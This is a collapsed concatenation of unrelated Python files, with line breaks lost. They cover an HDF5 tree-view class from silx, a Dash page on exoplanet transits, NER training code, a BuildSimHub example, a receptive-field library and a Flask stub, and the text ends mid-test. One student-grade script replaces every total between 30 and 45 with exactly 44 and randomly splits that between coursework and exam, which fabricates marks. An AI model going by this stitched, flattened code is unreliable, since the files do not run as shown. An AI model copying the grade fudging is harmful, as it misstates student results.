import TextField, PasswordField from wtforms.validators import DataRequired, Email class LoginForm(FlaskForm): email = TextField('Email Address', [DataRequired(), Email()]) password = PasswordField('Password', [DataRequired()]) n = int(input()) l1 = list(map(int, input().split())) m = int(input()) l2 = list(map(int, input().split())) d = [0 for i in range(100001)] for i in range(n) : d[l1[i]] = i a = 0 b = 0 for i in range(m): a += d[l2[i]]+1 b += n-d[l2[i]] print(a,b) PiRK/silx # coding: utf-8 # /*########################################################################## # # Copyright (c) 2016-2017 European Synchrotron Radiation Facility # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # # ###########################################################################*/ __authors__ = [""] __license__ = "MIT" __date__ = "20/01/2017" import numpy import logging import collections from .. import qt from .. import icons from . import _utils from .Hdf5Node import Hdf5Node import silx.io.utils from silx.gui.data.TextFormatter import TextFormatter _logger = logging.getLogger(__name__) try: import h5py except ImportError as e: _logger.error("Module %s requires h5py", __name__) raise e _formatter = TextFormatter() class Hdf5Item(Hdf5Node): """Subclass of :class:`qt.QStandardItem` to represent an HDF5-like item (dataset, file, group or link) as an element of a HDF5-like tree structure. """ def __init__(self, text, obj, parent, key=None, h5pyClass=None, isBroken=False, populateAll=False): """ :param str text: text displayed :param object obj: Pointer to h5py data. See the `obj` attribute. """ self.__obj = obj self.__key = key self.__h5pyClass = h5pyClass self.__isBroken = isBroken self.__error = None self.__text = text Hdf5Node.__init__(self, parent, populateAll=populateAll) @property def obj(self): if self.__key: self.__initH5pyObject() return self.__obj @property def basename(self): return self.__text @property def h5pyClass(self): """Returns the class of the stored object. When the object is in lazy loading, this method should be able to return the type of the futrue loaded object. It allows to delay the real load of the object. :rtype: h5py.File or h5py.Dataset or h5py.Group """ if self.__h5pyClass is None: self.__h5pyClass = silx.io.utils.get_h5py_class(self.obj) return self.__h5pyClass def isGroupObj(self): """Returns true if the stored HDF5 object is a group (contains sub groups or datasets). :rtype: bool """ return issubclass(self.h5pyClass, h5py.Group) def isBrokenObj(self): """Returns true if the stored HDF5 object is broken. The stored object is then an h5py link (external or not) which point to nowhere (tbhe external file is not here, the expected dataset is still not on the file...) :rtype: bool """ return self.__isBroken def _expectedChildCount(self): if self.isGroupObj(): return len(self.obj) return 0 def __initH5pyObject(self): """Lazy load of the HDF5 node. It is reached from the parent node with the key of the node.""" parent_obj = self.parent.obj try: obj = parent_obj.get(self.__key) except Exception as e: _logger.debug("Internal h5py error", exc_info=True) try: self.__obj = parent_obj.get(self.__key, getlink=True) except Exception: self.__obj = None self.__error = e.args[0] self.__isBroken = True else: if obj is None: # that's a broken link self.__obj = parent_obj.get(self.__key, getlink=True) # TODO monkey-patch file (ask that in h5py for consistency) if not hasattr(self.__obj, "name"): parent_name = parent_obj.name if parent_name == "/": self.__obj.name = "/" + self.__key else: self.__obj.name = parent_name + "/" + self.__key # TODO monkey-patch file (ask that in h5py for consistency) if not hasattr(self.__obj, "file"): self.__obj.file = parent_obj.file if isinstance(self.__obj, h5py.ExternalLink): message = "External link broken. Path %s::%s does not exist" % (self.__obj.filename, self.__obj.path) elif isinstance(self.__obj, h5py.SoftLink): message = "Soft link broken. Path %s does not exist" % (self.__obj.path) else: name = self.obj.__class__.__name__.split(".")[-1].capitalize() message = "%s broken" % (name) self.__error = message self.__isBroken = True else: self.__obj = obj self.__key = None def _populateChild(self, populateAll=False): if self.isGroupObj(): for name in self.obj: try: class_ = self.obj.get(name, getclass=True) has_error = False except Exception as e: _logger.error("Internal h5py error", exc_info=True) try: class_ = self.obj.get(name, getclass=True, getlink=True) except Exception as e: class_ = h5py.HardLink has_error = True item = Hdf5Item(text=name, obj=None, parent=self, key=name, h5pyClass=class_, isBroken=has_error) self.appendChild(item) def hasChildren(self): """Retuens true of this node have chrild. :rtype: bool """ if not self.isGroupObj(): return False return Hdf5Node.hasChildren(self) def _getDefaultIcon(self): """Returns the icon displayed by the main column. :rtype: qt.QIcon """ style = qt.QApplication.style() if self.__isBroken: icon = style.standardIcon(qt.QStyle.SP_MessageBoxCritical) return icon class_ = self.h5pyClass if issubclass(class_, h5py.File): return style.standardIcon(qt.QStyle.SP_FileIcon) elif issubclass(class_, h5py.Group): return style.standardIcon(qt.QStyle.SP_DirIcon) elif issubclass(class_, h5py.SoftLink): return style.standardIcon(qt.QStyle.SP_DirLinkIcon) elif issubclass(class_, h5py.ExternalLink): return style.standardIcon(qt.QStyle.SP_FileLinkIcon) elif issubclass(class_, h5py.Dataset): if len(self.obj.shape) < 4: name = "item-%ddim" % len(self.obj.shape) else: name = "item-ndim" if str(self.obj.dtype) == "object": name = "item-object" icon = icons.getQIcon(name) return icon return None def _humanReadableShape(self, dataset): if dataset.shape == tuple(): return "scalar" shape = [str(i) for i in dataset.shape] text = u" \u00D7 ".join(shape) return text def _humanReadableValue(self, dataset): if dataset.shape == tuple(): numpy_object = dataset[()] text = _formatter.toString(numpy_object) else: if dataset.size < 5 and dataset.compression is None: numpy_object = dataset[0:5] text = _formatter.toString(numpy_object) else: dimension = len(dataset.shape) if dataset.compression is not None: text = "Compressed %dD data" % dimension else: text = "%dD data" % dimension return text def _humanReadableDType(self, dtype, full=False): if dtype.type == numpy.string_: text = "string" elif dtype.type == numpy.unicode_: text = "string" elif dtype.type == numpy.object_: text = "object" elif dtype.type == numpy.bool_: text = "bool" elif dtype.type == numpy.void: if dtype.fields is None: text = "raw" else: if not full: text = "compound" else: compound = [d[0] for d in dtype.fields.values()] compound = [self._humanReadableDType(d) for d in compound] text = "compound(%s)" % ", ".join(compound) else: text = str(dtype) return text def _humanReadableType(self, dataset, full=False): return self._humanReadableDType(dataset.dtype, full) def _setTooltipAttributes(self, attributeDict): """ Add key/value attributes that will be displayed in the item tooltip :param Dict[str,str] attributeDict: Key/value attributes """ if issubclass(self.h5pyClass, h5py.Dataset): attributeDict["Title"] = "HDF5 Dataset" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name attributeDict["Shape"] = self._humanReadableShape(self.obj) attributeDict["Value"] = self._humanReadableValue(self.obj) attributeDict["Data type"] = self._humanReadableType(self.obj, full=True) elif issubclass(self.h5pyClass, h5py.Group): attributeDict["Title"] = "HDF5 Group" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name elif issubclass(self.h5pyClass, h5py.File): attributeDict["Title"] = "HDF5 File" attributeDict["Name"] = self.basename attributeDict["Path"] = "/" elif isinstance(self.obj, h5py.ExternalLink): attributeDict["Title"] = "HDF5 External Link" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name attributeDict["Linked path"] = self.obj.path attributeDict["Linked file"] = self.obj.filename elif isinstance(self.obj, h5py.SoftLink): attributeDict["Title"] = "HDF5 Soft Link" attributeDict["Name"] = self.basename attributeDict["Path"] = self.obj.name attributeDict["Linked path"] = self.obj.path else: pass def _getDefaultTooltip(self): """Returns the default tooltip :rtype: str """ if self.__error is not None: self.obj # lazy loading of the object return self.__error attrs = collections.OrderedDict() self._setTooltipAttributes(attrs) title = attrs.pop("Title", None) if len(attrs) > 0: tooltip = _utils.htmlFromDict(attrs, title=title) else: tooltip = "" return tooltip def dataName(self, role): """Data for the name column""" if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: return self.__text if role == qt.Qt.DecorationRole: return self._getDefaultIcon() if role == qt.Qt.ToolTipRole: return self._getDefaultTooltip() return None def dataType(self, role): """Data for the type column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__error is not None: return "" class_ = self.h5pyClass if issubclass(class_, h5py.Dataset): text = self._humanReadableType(self.obj) else: text = "" return text return None def dataShape(self, role): """Data for the shape column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__error is not None: return "" class_ = self.h5pyClass if not issubclass(class_, h5py.Dataset): return "" return self._humanReadableShape(self.obj) return None def dataValue(self, role): """Data for the value column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__error is not None: return "" if not issubclass(self.h5pyClass, h5py.Dataset): return "" return self._humanReadableValue(self.obj) return None def dataDescription(self, role): """Data for the description column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: if self.__isBroken: self.obj # lazy loading of the object return self.__error if "desc" in self.obj.attrs: text = self.obj.attrs["desc"] else: return "" return text if role == qt.Qt.ToolTipRole: if self.__error is not None: self.obj # lazy loading of the object self.__initH5pyObject() return self.__error if "desc" in self.obj.attrs: text = self.obj.attrs["desc"] else: return "" return "Description: %s" % text return None def dataNode(self, role): """Data for the node column""" if role == qt.Qt.DecorationRole: return None if role == qt.Qt.TextAlignmentRole: return qt.Qt.AlignTop | qt.Qt.AlignLeft if role == qt.Qt.DisplayRole: class_ = self.h5pyClass text = class_.__name__.split(".")[-1] return text if role == qt.Qt.ToolTipRole: class_ = self.h5pyClass return "Class name: %s" % self.__class__ return None import dash import dash_bootstrap_components as dbc import dash_core_components as dcc import dash_html_components as html from dash.dependencies import Input, Output import plotly.express as px from app import app """ https://dash-bootstrap-components.opensource.faculty.ai/l/components/layout Layout in Bootstrap is controlled using the grid system. The Bootstrap grid has twelve columns. There are three main layout components in dash-bootstrap-components: Container, Row, and Col. The layout of your app should be built as a series of rows of columns. We set md=4 indicating that on a 'medium' sized or larger screen each column should take up a third of the width. Since we don't specify behaviour on smaller size screens Bootstrap will allow the rows to wrap so as not to squash the content. """ header = dbc.Col( [ dcc.Markdown( """ ![header](/assets/header.png) """ ), ], md=12, style={ 'textAlign':'center', } ) column1 = dbc.Col( [ dcc.Markdown( """ ## Predicting Transits Using raw `.fits` files, this app is able to convert space telescope data into readable lightcurves, and find the signals for planetary (or other) types of transits. \n If you can supply your own `.fits` file, the model can predict if it contains transit signals! """ ), dcc.Link(dbc.Button('Try it now!', color='secondary'), href='/predictions') ], md=5, ) column2 = dbc.Col( [ html.H3('What is a Transit?', style={'textAlign':'center'}), dcc.Markdown( """ ![lc](assets/ex-transit.svg) """ ), ], md=7, style={ 'textAlign':'center', }, ) column3 = dbc.Col( [ html.P(' ') ], md=5, ) column4 = dbc.Col( [ dcc.Markdown( """ A transit is typically identified by a sharp decrease in observed star luminosity. By studying these graphs, one can observe visual indication of a planetary transit. The dips may be harder to spot, if the planet is relatively small, or if the star is very dim. Because of these factors, it's helpful to have a model that can clue you in on which lightcurves possibly have transits, and which don't! """ ) ], md=7, ) layout = dbc.Row([header]),dbc.Row([column1, column2]), dbc.Row([column3, column4]) from networkx_mod.algorithms.community.kclique import * code/models/model.py10-100 import logging import numpy as np from tensorboardX import SummaryWriter from torch import nn from torch.nn.utils import clip_grad_value_ from tqdm import tqdm from data.data_iterator import ids2seq from utils.evaluation import compute_score, compute_score_overlap, add_score, add_score_overlap from utils.torch_utils import save_checkpoint, weight_init class Model(nn.Module): def train_step(self, batch, optimizer, grad_clipping=0, optimizer_step=True, gradient_accumulation=1, **kwargs): self.forward(batch, **kwargs) loss = self.loss(batch) / gradient_accumulation loss.backward() if grad_clipping > 0: clip_grad_value_(self.parameters(), grad_clipping) if optimizer_step: optimizer.step() self.zero_grad() def run_epoch(self, iterators, epoch, optimizer, writer, grad_clipping=0, train_key="train", gradient_accumulation=1, **kwargs): self.train() iterators[train_key].reinit() losses = [] n_batches = iterators[train_key].nbatches for i in tqdm(range(n_batches)): n_iter = epoch * n_batches + i batch = iterators[train_key].__next__() self.train_step(batch, optimizer, grad_clipping=grad_clipping, optimizer_step=(i + 1) % gradient_accumulation == 0, gradient_accumulation=gradient_accumulation, **kwargs) writer.add_scalars("ner_loss", {"train": batch["ner_loss"].item()}, n_iter) losses.append(batch["ner_loss"].item()) if "loss" in batch.keys(): writer.add_scalars("loss", {"train": batch["loss"].item()}, n_iter) return losses def train_loop(self, iterators, optimizer, run_dir, epochs=100, min_epochs=0, patience=5, epoch_start=0, best_f1=None, epochs_no_improv=None, grad_clipping=0, overlap=None, train_entities=None, train_key="train", dev_key="dev", eval_on_train=False, gradient_accumulation=1, **kwargs): logging.info("Starting train loop: {} epochs; {} min; {} patience".format(epochs, min_epochs, patience)) if best_f1 is None: best_f1 = 0 if epochs_no_improv is None: epochs_no_improv = 0 if not train_key == "train": patience = 0 if patience and epoch_start > min_epochs and epochs_no_improv >= patience: logging.info("Early stopping after {} epochs without improvement.".format(patience)) else: writer = SummaryWriter(run_dir) for epoch in range(epoch_start, epochs): logging.info("Epoch {}/{} :".format(epoch + 1, epochs)) train_losses = self.run_epoch(iterators, epoch, optimizer, writer, grad_clipping=grad_clipping, train_key=train_key, gradient_accumulation=gradient_accumulation) n_iter = (epoch + 1) * len(list(train_losses)) if eval_on_train: logging.info("Train eval") self.evaluate(iterators["ner"][train_key]) _, ner_loss, ner_scores = self.evaluate(iterators[dev_key], overlap=overlap, train_entities=train_entities) logging.info("Train NER Loss : {}".format(np.mean(train_losses))) logging.info("Dev NER Loss : {}".format(ner_loss)) if overlap is None: if "ner" in iterators.keys(): add_score(writer, ner_scores, n_iter) else: if "ner" in iterators.keys(): add_score_overlap(writer, ner_scores, n_iter, task="ner") f1 = ner_scores["ALL"]["f1"] if f1 > best_f1: logging.info(f"New best NER F1 score on dev : {f1}") logging.info("Saving model...") best_f1 = f1 epochs_no_improv = 0 is_best = True else: epochs_no_improv += 1 is_best = False state = {'epoch': epoch + 1, 'epochs_no_improv': epochs_no_improv, 'model': self.state_dict(), 'scores': ner_scores, 'optimizer': optimizer.state_dict() } save_checkpoint(state, is_best, checkpoint=run_dir + 'ner_checkpoint.pth.tar', best=run_dir + 'ner_best.pth.tar') writer.add_scalars("ner_loss", {"dev": ner_loss}, n_iter) if patience and epoch > min_epochs and epochs_no_improv >= patience: logging.info( f"Early stopping after {patience} epochs without improvement on NER.") break writer.export_scalars_to_json(run_dir + "all_scalars.json") writer.close() def evaluate(self, iterator, overlap=None, train_entities=None, correct_iob=False): self.eval() iterator.reinit() preds = [] losses = [] labels = [] entities = sorted([k.split("-")[1] for k in self.decoder.tag2idx.keys() if k[0] == "B"]) if overlap is not None: assert train_entities is not None sents = [] for data in tqdm(iterator): self.forward(data) predictions = data["ner_output"] predictions = self.decoder.decode(predictions, data["nwords"]) loss = data["ner_loss"] losses.append(loss.item()) if overlap is not None: sents.extend(data["sents"]) for i in range(len(data["tags"])): labels.append( ids2seq(data["tags"][i, :data["nwords"][i]].tolist(), self.decoder.idx2tag)) preds.append(predictions[i]) if overlap is None: return preds, np.mean(losses), compute_score(preds, labels, entities=entities, scheme=self.scheme, correct=correct_iob) else: return preds, np.mean(losses), compute_score_overlap(sents, preds, labels, overlap, train_entities, scheme=self.scheme, correct=correct_iob) def predict(self, iterator): self.eval() iterator.reinit() preds = [] for data in tqdm(iterator): predictions = self.forward(data) preds.append(self.decoder.decode(predictions, data["nwords"])) return preds class EmbedderEncoderDecoder(Model): def __init__(self, embedder, encoder, decoder, scheme="iobes"): super(EmbedderEncoderDecoder, self).__init__() # parameters self.embedder = embedder self.encoder = encoder self.decoder = decoder self.scheme = scheme if self.encoder is not None: weight_init(self.encoder) weight_init(self.decoder) def forward(self, data): data.update({"embeddings": self.embedder(data)["embeddings"]}) if self.encoder is not None: data.update({"encoded": self.encoder(data)["output"]}) else: data.update({"encoded": data["embeddings"]}) self.decoder(data) if self.decoder.supervision in data.keys(): data.update({"ner_loss": self.decoder.loss(data)}) return data def loss(self, data): return self.decoder.loss(data) import pandas as pd from numpy.random import randint data = pd.read_csv('mubeena1.csv') TCW = [] EM = [] TM = [] Grade = [] Comment = [] for i in range(len(data)): CW = 0.4 * data.iloc[i][0] TEM = 0.6 * data.iloc[i][1] if CW > 35: CW = 40 print("New Cw is " + str(CW)) if TEM > 55: TEM = 60 total = CW +TEM if total > 30 and total < 45: CW = randint(0,43) TEM = 44 - CW total = 44 EM.append(round(TEM)) TCW.append(round(CW)) TM.append(round(total)) if total < 45: grade = 'F' Grade.append(grade) elif total > 44 and total < 55: grade = 'P' Grade.append(grade) elif total >54 and total <65: grade = '2.2' Grade.append(grade) elif total >64 and total < 75: grade = '2.1' Grade.append(grade) else: grade = '1' Grade.append(grade) if CW > 12: if TEM > 15: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if CW > 38: comment = "Perfect Course Work Score" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam Mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if TEM > 32: if CW > 9: if TEM > 40: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if TEM > 59: comment = "Perfect Exam mark Score" Comment.append(comment) else: if total == 44: comment = "Boarderline Failure" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) for i in range(len(data)): CW = 0.4 * data.iloc[i][2] TEM = 0.6 * data.iloc[i][3] if CW > 35: CW = 40 print("New Cw is " + str(CW)) if TEM > 55: TEM = 60 total = CW +TEM if total > 30 and total < 45: CW = randint(0,43) TEM = 44 - CW total = 44 EM.append(round(TEM)) TCW.append(round(CW)) TM.append(round(total)) if total < 45: grade = 'F' Grade.append(grade) elif total > 44 and total < 55: grade = 'P' Grade.append(grade) elif total >54 and total <65: grade = '2.2' Grade.append(grade) elif total >64 and total < 75: grade = '2.1' Grade.append(grade) else: grade = '1' Grade.append(grade) if CW > 12: if TEM > 15: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if CW > 38: comment = "Perfect Course Work Score" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam Mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if TEM > 32: if CW > 9: if TEM > 40: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if TEM > 59: comment = "Perfect Exam mark Score" Comment.append(comment) else: if total == 44: comment = "Boarderline Failure" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) else: comment = "Disproportinate TCW TO TOTAL Exam Mark" Comment.append(comment) else: if CW > 39: comment = "Perfect Course Work Score" Comment.append(comment) else: if total == 44: comment = "Borderline Failure" Comment.append(comment) else: if TEM > 58: comment = "Perfect Exam mark Score" Comment.append(comment) else: comment = "Normal" Comment.append(comment) NewData = { "Course Work": TCW, "Exam Mark": EM, "Total": TM, "Comment": Comment } Dataset = pd.DataFrame(NewData,columns= ['Course Work','Exam Mark','Total','Comment']) Export = Dataset.to_csv('newdata.csv',index=None,header=True) """ zone load test Make sure you have the latest python plotly installed pip: pip install plotly or update: pip install plotly --upgrade If you have python 2 and 3 installed on your computer, try: pip3 install plotly """ import BuildSimHubAPI as bshapi import BuildSimHubAPI.postprocess as pp # project_key can be found in every project (click the information icon next to project name) project_api_key = '' # model_key can be found in each model information bar model_api_key = '' # initialize the client bsh = bshapi.BuildSimHubAPIClient() results = bsh.model_results(project_api_key, model_api_key) zone_load_data = results.zone_load() zone_level_load = pp.ZoneLoad(zone_load_data) print(zone_level_load.pandas_df()) zone_level_load.load_bar_chart_plot('density') one_zone_load_data = results.zone_load('CORE_TOP') one_zone_load = pp.OneZoneLoad(one_zone_load_data) print(one_zone_load.heating_load_component_detail()) one_zone_load.load_component_plot('cooling') 0 from abc import ABCMeta, abstractmethod from typing import Tuple, Callable, Any, Optional, List import matplotlib.pyplot as plt import numpy as np from receptivefields.common import estimate_rf_from_gradients from receptivefields.logging import get_logger from receptivefields.plotting import plot_receptive_grid, plot_gradient_field, plot_gradient_field_self from receptivefields.types import ( ImageShape, GridPoint, GridShape, ReceptiveFieldDescription, Size, FeatureMapDescription, ) _logger = get_logger() class ReceptiveField(metaclass=ABCMeta): def __init__(self, model_func: Callable[[Any], Any]) -> None: self._model_func: Callable[[Any], Any] = model_func self._gradient_function: Callable = None self._input_shape: GridShape = None self._output_shapes: List[GridShape] = None self._rf_params: List[ReceptiveFieldDescription] = None self._built: bool = False @property def feature_maps_desc(self) -> List[FeatureMapDescription]: """Return description of all feature maps""" self._check() return [ FeatureMapDescription(size=Size(size.w, size.h), rf=rf) for size, rf in zip(self._output_shapes, self._rf_params) ] @property def input_shape(self) -> ImageShape: """Return input shape of the feature extractor""" self._check() return ImageShape( w=self._input_shape.w, h=self._input_shape.h, c=self._input_shape.c ) @property def output_shapes(self) -> List[Size]: """Return a list of sizes of selected features maps""" self._check() return [Size(w=size.w, h=size.h) for size in self._output_shapes] @property def num_feature_maps(self) -> int: """Returns number of features maps""" self._check() return len(self._output_shapes) def _build_gradient_func(self, *args, **kwargs) -> None: """ Build gradient function and collect the input shape of the image and feature map shapes. :param args: a list of arguments which depend on the API :param kwargs: keywords which depend on the API """ gradient_function, input_shape, output_shapes = self._prepare_gradient_func( *args, **kwargs ) self._built = True self._gradient_function = gradient_function self._input_shape = input_shape self._output_shapes = output_shapes @abstractmethod def _prepare_gradient_func( self, *args, **kwargs ) -> Tuple[Callable, GridShape, List[GridShape]]: """ Computes gradient function and additional parameters. Note that the receptive field parameters like stride or size, do not depend on input image shape. However, if the RF of original network is bigger than input_shape this method will fail. Hence it is recommended to increase the input shape. The arguments args, and kwargs must be compatible with args in `compute` and `_build_gradient_func` functions. :param args: a list of arguments which depend on the API :param kwargs: keywords which depend on the API :returns gradient_function: a function which returns gradient w.r.t. to the input image. The usage of the gradient function may depend on the API. input_shape: a shape of the input image tensor output_shape: a shapes of the output feature map tensors """ pass @abstractmethod def _get_gradient_from_grid_points( self, points: List[GridPoint], intensity: float = 1.0 ) -> List[np.ndarray]: """ Computes gradient at input image generated by point-like perturbation at output grid location given by @point coordinates. :param points: source coordinate of the backpropagated gradient for each feature map. :param intensity: scale of the gradient, default = 1 :return gradient maps for each feature map """ pass def _get_gradient_activation_at_map_center( self, center_offsets: List[GridPoint], intensity: float = 1 ) -> List[np.ndarray]: points = [] for fm in range(self.num_feature_maps): output_shape = self._output_shapes[fm] center_offset = center_offsets[fm] _logger.debug( f"Computing receptive field for feature map [{fm}] at center " f"({output_shape.w//2}, {output_shape.h//2}) " f"with offset {center_offset}" ) # compute grid center w = output_shape.w h = output_shape.h cx = w // 2 - 1 if w % 2 == 0 else w // 2 cy = h // 2 - 1 if h % 2 == 0 else h // 2 cx += center_offset.x cy += center_offset.y points.append(GridPoint(x=cx, y=cy)) return self._get_gradient_from_grid_points(points=points, intensity=intensity) def _check(self): if not self._built: raise Exception( "Receptive field not computed. Run compute function.") def compute(self, *args, **kwargs) -> List[FeatureMapDescription]: """ Compute ReceptiveFieldDescription of given model for image of shape input_shape [H, W, C]. If receptive field of the network is bigger thant input_shape this method will raise exception. In order to solve with problem try to increase input_shape. :param args: a list of arguments which depend on the API :param kwargs: keywords which depend on the API :return a list of estimated FeatureMapDescription for each feature map. """ # define gradient function self._build_gradient_func(*args, **kwargs) # receptive field at map center rf_grads00 = self._get_gradient_activation_at_map_center( center_offsets=[GridPoint(0, 0)] * self.num_feature_maps ) rfs_at00 = estimate_rf_from_gradients(rf_grads00) # receptive field at map center with offset (1, 1) rf_grads11 = self._get_gradient_activation_at_map_center( center_offsets=[GridPoint(1, 1)] * self.num_feature_maps ) rfs_at11 = estimate_rf_from_gradients(rf_grads11) # receptive field at feature map grid start x=0, y=0 rf_grads_point00 = self._get_gradient_from_grid_points( points=[GridPoint(0, 0)] * self.num_feature_maps ) rfs_at_point00 = estimate_rf_from_gradients(rf_grads_point00) self._rf_params = [] for fm, (rf_at_point00, rf_at00, rf_at11) in enumerate( zip(rfs_at_point00, rfs_at00, rfs_at11) ): # compute position of the first anchor, center point of rect x0 = rf_at_point00.w - rf_at00.w / 2 y0 = rf_at_point00.h - rf_at00.h / 2 # compute feature map/input image offsets dx = rf_at11.x - rf_at00.x dy = rf_at11.y - rf_at00.y # compute receptive field size size = Size(rf_at00.w, rf_at00.h) rf_params = ReceptiveFieldDescription( offset=(x0, y0), stride=(dx, dy), size=size ) _logger.info( f"Estimated receptive field for feature map [{fm}]: {rf_params}" ) self._rf_params.append(rf_params) return self.feature_maps_desc def plot_gradients_at( self, points: List[GridPoint], image: Optional[np.ndarray] = None, layout: Optional[Tuple[int, int]] = None, figsize: Optional[Tuple[int, int]] = None, ) -> None: """ Plot gradient map generated by certain `point` at feature map. :param points: a list of GridPoint on feature maps. :param image: (optional) image of shape [W, H, 3] :param layout: (optional) a matplotlib subplot layout given by tuple of form (num_rows, num_cols). If None the layout is set to (num_feature_maps, 1). :param figsize: (optional) a matplotlib figsize. If None the default figure is used. """ if layout is None: layout = (self.num_feature_maps, 1) if figsize is not None: plt.figure(figsize=figsize) receptive_field_grads = self._get_gradient_from_grid_points( points=[GridPoint(*point) for point in points] ) for fm in range(self.num_feature_maps): axis = plt.subplot(layout[0], layout[1], fm + 1) plot_gradient_field( receptive_field_grad=receptive_field_grads[fm], image=image, axis=axis ) def plot_gradient_at( self, fm_id: int, point: GridPoint, image: Optional[np.ndarray] = None, **plot_params, ) -> None: """ Plot gradient map generated by certain `point` at selected feature map. :param fm_id: an index of feature map for which gradient map will be plotted. :param point: a GridPoint on feature map selected by fm_id. :param image: (optional) image of shape [W, H, 3] :param plot_params: (optional) additional plot parameters: figsize: tuple of int (5, 5) axis: a matplotlib axis object as returned by e.g. plt.subplot function. If not None then provided axis is used for visualizations otherwise default figure is created, with optional figsize. """ points = [GridPoint(0, 0)] * self.num_feature_maps points[fm_id] = GridPoint(*point) receptive_field_grads = self._get_gradient_from_grid_points( points=points) plot_gradient_field( receptive_field_grad=receptive_field_grads[fm_id], image=image, **plot_params, ) def plot_gradient_self( self, fm_id: int, point: GridPoint, image: Optional[np.ndarray] = None, title: str = "receptive field", **plot_params, ) -> None: points = [GridPoint(0, 0)] * self.num_feature_maps points[fm_id] = GridPoint(*point) receptive_field_grads = self._get_gradient_from_grid_points( points=points) grad_img = plot_gradient_field_self( receptive_field_grad=receptive_field_grads[fm_id], image=image, **plot_params, ) plt.title(title) plt.imshow(grad_img, cmap="hot") plt.imsave(f"results/{title}.png", grad_img, cmap="hot") def plot_rf_grid( self, fm_id: int, custom_image: Optional[np.ndarray] = None, plot_naive_rf: bool = False, **plot_params, ) -> None: """ Visualize receptive field grid for selected feature map. :param fm_id: an index of feature map for which gradient map will be plotted. :param custom_image: (optional) image of shape [W, H, 3] :param plot_naive_rf: plot naive version of the receptive field. Naive version of RF does not take strides, and offsets into considerations, it is a simple linear mapping from N points in feature map to pixels in the image. :param plot_params: (optional) additional plot parameters: figsize: tuple of int (5, 5) axis: a matplotlib axis object as returned by e.g. plt.subplot function. If not None then provided axis is used for visualizations otherwise default figure is created, with optional figsize. """ plot_receptive_grid( input_shape=self._input_shape, output_shape=self._output_shapes[fm_id], rf_params=self._rf_params[fm_id], custom_image=custom_image, plot_naive_rf=plot_naive_rf, **plot_params, ) def plot_rf_grids( self, custom_image: Optional[np.ndarray] = None, plot_naive_rf: bool = False, layout: Optional[Tuple[int, int]] = None, figsize: Optional[Tuple[int, int]] = None, ) -> None: """ Visualize receptive field grid for selected feature map. :param custom_image: (optional) image of shape [W, H, 3] :param plot_naive_rf: plot naive version of the receptive field. Naive version of RF does not take strides, and offsets into considerations, it is a simple linear mapping from N points in feature map to pixels in the image. :param layout: (optional) a matplotlib subplot layout given by tuple of form (num_rows, num_cols). If None the layout is set to (num_feature_maps, 1). :param figsize: (optional) a matplotlib figsize. If None the default figure is used. """ if layout is None: layout = (self.num_feature_maps, 1) if figsize is not None: plt.figure(figsize=figsize) for fm in range(self.num_feature_maps): axis = plt.subplot(layout[0], layout[1], fm + 1) self.plot_rf_grid( fm_id=fm, custom_image=custom_image, plot_naive_rf=plot_naive_rf, axis=axis, ) FlaskAPI Basic/apiservice.py from flask import Flask from flask_restful import Api from resources.routes import initialize_routes project = "flaskAPI" app = Flask(__name__) api = Api(app) initialize_routes(api) if __name__ == "__main__": # app.run(host='0.0.0.0', debug=False) app.run(debug=True)import os from battlemuffin.clients.warcraft_client import WarcraftClient from battlemuffin.config.region_config import Locale, Region def test_get_playable_classes_index(snapshot): client = WarcraftClient( os.getenv("CLIENT_ID"), os.getenv("CLIENT_SECRET"), Region.us, 